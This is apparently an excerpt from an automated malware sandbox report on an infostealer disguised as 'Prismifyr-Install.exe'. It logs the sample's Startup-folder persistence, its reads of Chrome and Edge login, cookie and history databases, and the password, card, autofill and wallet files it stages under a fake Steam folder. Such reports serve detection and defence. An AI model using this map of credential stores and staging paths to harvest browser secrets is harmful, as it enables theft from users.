      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Downloads\GRXZDKKVDB.mp3 VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Downloads\MXPXCVPDVN.docx VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Pictures VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ATSCRGPSUM.png VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QNCYCDFIJJ.jpg VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BWDRWEEARI.mp3 VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\IPKGELNTQY VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\SQSJKEBWDT VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\202491-7716-19tt98d.qpv5.png VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\202491-7716-19tt98d.qpv5.png VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Steam\Launcher\g5syNVTZ\EN-701188\Passwords\Passwords.txt VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Steam\Launcher\g5syNVTZ\EN-701188\Passwords\Passwords.txt VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Steam\Launcher\g5syNVTZ\EN-701188\Autofills\Autofills.txt VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Steam\Launcher\g5syNVTZ\EN-701188\Wallets VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Steam\Launcher\g5syNVTZ\EN-701188\Extension VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Steam\Launcher\g5syNVTZ\EN-701188\Bookmarks\Bookmarks.txt VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Steam\Launcher\g5syNVTZ\EN-701188\History\History.txt VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Steam\Launcher\g5syNVTZ\EN-701188\History\History.txt VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Steam\Launcher\g5syNVTZ\EN-701188\Private Files VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Steam\Launcher VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.log VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Passwords\Passwords.txt VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Passwords\Passwords.txt VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Passwords\Passwords.txt VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database-journal VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\discounts_db VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOCK VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOG VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_and_features_store VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferredApps VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_hint_cache_store VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data-journal VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebAssistDatabase VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Documents VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe, type: DROPPED
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile created: C:\ProgramData\Steam\Launcher\g5syNVTZ\EN-701188\Credit Card\Cards.txt
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile created: C:\ProgramData\Steam\Launcher\g5syNVTZ\EN-701188\Cookies\Google_Default.txt
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeFile created: C:\ProgramData\Steam\Launcher\3irAZ7k6\EN-701188\Cookies\Google_Default.txtJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeFile created: C:\ProgramData\Steam\Launcher\3irAZ7k6\EN-701188\Passwords\Passwords.txtJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeFile created: C:\ProgramData\Passwords\Passwords.txtJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeFile created: C:\ProgramData\Steam\Launcher\3irAZ7k6\EN-701188\Autofills\Autofills.txtJump to behavior
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile created: C:\ProgramData\Steam\Launcher\g5syNVTZ\EN-701188\Autofills\Autofills.txt
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile created: C:\ProgramData\Steam\Launcher\g5syNVTZ\EN-701188\Passwords\Passwords.txt
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeFile created: C:\ProgramData\Steam\Launcher\3irAZ7k6\EN-701188\Credit Card\Cards.txtJump to behavior
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DIPS-journal
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\history.db
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsSiteData-journal
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Microsoft\edge\User Data\Default\Login Data-journal
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts-journal
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.log
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites-journal
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Search Logos
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
